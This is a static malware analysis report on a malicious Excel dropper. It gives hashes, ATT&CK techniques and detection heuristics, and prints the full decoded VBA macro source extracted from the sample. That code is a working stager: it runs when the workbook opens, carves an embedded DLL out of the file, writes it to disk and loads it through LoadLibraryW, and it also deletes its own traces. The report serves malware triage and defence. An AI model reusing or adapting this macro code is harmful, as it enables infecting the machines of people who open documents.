Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 55ed82dce7d88a19…

MALICIOUS

Office (OLE)

742.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2019-10-30
MD5: df580709d68df472bc7ed2cefadd24b6 SHA-1: 562463604d7fcb79f7e4d154c5a8f58fbd138c9e SHA-256: 55ed82dce7d88a19a6a9d8875c94688ca476b84bfba3fbfc0caff6e9f5525b83
500 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1027 Obfuscated Files or Information

This Excel document contains VBA macros that utilize WScript.Shell and CreateObject to execute embedded code. The critical heuristic 'OLE_EMBEDDED_EXE' indicates a PE executable is embedded within the document, and 'OLE_VBA_ACTIVEX_XLM_STAGER' suggests a mechanism to launch this executable. The presence of VirtualAlloc and VirtualProtect API calls further suggests the execution of shellcode or dynamically loaded code.

Heuristics 12

  • ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim SpecialPath As String
Set D500 = CreateObject("WScript.Shell")
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script
    Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim SpecialPath As String
Set D500 = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8010 bytes
SHA-256: 2fdbb7387ec95608b3db06dd9f891f58ce9933ddbe09ad22196d9addbdfb86f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.Workbook_Activate
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function RbdSAslla Lib _
        "module_p2.dll" () As Integer
    Public Declare PtrSafe Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function RbdSAslla Lib _
        "module_p1.dll" () As Integer
#End If
        

Public Sub NewValuje(s As String, nm As String, fl As Long, d_6 As Integer)
    Dim d_1 As Long, d_2 As Byte, d_3 As Byte, d_4 As Byte
    Dim d_5() As Long

    ReDim d_5(1 To fl)
    d_5(1) = CByte(50 + 27)
    d_5(2) = CByte(50 + 40)
    d_5(3) = CByte(50 + 94)
    
    d_1 = FreeFile
    Open s For Binary Access Read As d_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(d_1)
        Get d_1, , d_2
        If d_2 = d_5(1) Then
           Get d_1, , d_3
           If d_3 = d_5(2) Then
                Get d_1, , d_4
                If d_4 = d_5(3) Then
                     If cur = d_6 Then
                        For k = 4 To fl
                            Get d_1, , d_2
                            d_5(k) = d_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close d_1
    
    d_1 = FreeFile
    Open nm For Binary Lock Read Write As #d_1
    For i = LBound(d_5) To UBound(d_5)
        Put #d_1, , CByte(d_5(i))
    Next i

    Close #d_1
End Sub


Public Sub Workbook_Activate()

ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"

Dim D500 As Object
    Dim SpecialPath As String
Set D500 = CreateObject("WScript.Shell")
   
UserForm2.TextBox1.Tag = D500.ExpandEnvironmentStrings("%" + UserForm2.TextBox1.Tag + "%")

UserForm2.TextBox1.Tag = Replace(UserForm2.TextBox1.Tag, "%", "")
UserForm2.TextBox2.Tag = D500.SpecialFolders(UserForm2.TextBox2.Tag)

ChDir (UserForm2.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9B3DABF1-341B-4E96-99C1-B7207A1AB871}{32B70631-FA61-4E0F-8568-AC4DDCD97227}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub






Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show = False Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

Else

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Attribute VB_Name = "Module3"


Public Sub ReplaceCurrentModule()
    TempName = UserForm2.TextBox1.Tag & "\templates.xlsx"
    ZipName = TempName + ".zip"
    ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp"
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm2.TextBox2.Tag + "\module_p1"
    API_LENGTH = 266240
    d_6 = 1
            
#If Win64 Then
    nm = UserForm2.TextBox2.Tag + "\module_p2"
    API_LENGTH = 186368
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        ActiveWorkbook.SaveAs TempName, FileFormat:=51
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy TempName, ZipName
        
        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1.bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm2.TextBox2.Tag)
        No_RbdSAslla = RbdSAslla2(nm)
        RbdSAslla

End Sub



Sub test()

Temp = "'" & ThisWorkbook.Path & "\[web.xlsm]Sheet1'!"
Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
        arr(R, C) = Application.ExecuteExcel4Macro(Temp3)
    Next
Next

Range("A1").ReAPI_LENGTH(RCount, CCount).Value = arr

End Sub



Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{60B2D69D-A27B-4B98-B9AA-38D5112CA728}{F641394C-4A27-46FC-926F-6EE29F9DC7B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
embedded_office_00003186.exe embedded-pe Office MZ+PE at offset 0x3186 747130 bytes
SHA-256: 0eb6ebb8cf869b8f212e05b5b41aa79c1d24c2e9d310b6b341438bc8fb16c4a9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin ole-package OLE Ole10Native stream: MBD006B9836/Ole10Native 465961 bytes
SHA-256: dbcae8c5a528096d8a676fbc8ae8b8863392f22f389f436f5eaa3aaaacec374a

Open this report in the interactive analyzer, or submit your own file for analysis.